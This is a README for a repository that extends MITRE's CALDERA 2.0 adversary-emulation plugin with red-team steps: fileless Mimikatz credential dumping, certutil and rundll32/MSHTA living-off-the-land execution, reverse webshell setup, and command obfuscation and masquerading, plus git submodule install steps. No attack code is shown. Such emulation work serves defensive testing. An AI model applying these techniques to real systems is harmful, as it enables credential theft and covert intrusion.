This repo contains changes made to the Adversary Plugin repo for CALDERA 2.0.
Video: Available here
Files that were changed include:
- The following steps:
- dump_creds, a fileless Mimikatz in PowerShell action using
CustomCommandLine
(see below); - certutil_download, which can download files using the Certutil LOLbin;
- rundll32_execution, which can execute commands using the RunDLL32/MSHTA LOLbin;
- webserver_install, which prepares a webserver installation (creates
OPSoftware
object, see below); and, - webshell_execution, which uses the above three actions to set up a reverse webshell.
- dump_creds, a fileless Mimikatz in PowerShell action using
- operation.py, which introduces
OPSoftware
, which is used by some of the above actions (to implement LOLbins); and, - command.py, which introduces
CustomCommandLine
, which can obfuscate commands and apply masquerading.
Note that this still a proof of concept, as it requires you to supplydrop_file
andfile_g
functions in order to make CALDERA aware of renamed binaries in case of masquerading. See e.g. dump_creds. This should be further optimised.
Make sure you have the most recent version of CALDERA (for instructions check the CALDERA repo).
You can either copy in the files manually to your caldera/plugins/adversary
folder, or:
- In the main
caldera/
folder, run the following command:git config --file=.gitmodules -e
- Update the
plugins/adversary
entry, pointing it tohttps://github.com/wietze/bsides-ldn-2019.git
(or[email protected]:wietze/bsides-ldn-2019.git
if you're using SSH) - Run the following command to update to the latest version of this repo:
git submodule sync && git submodule update --remote --merge
If you want to return to the original MITRE repository, follow steps 1-3 again, but use https://github.com/mitre/adversary.git
in step 2.
(or [email protected]:mitre/adversary.git
if you're using SSH)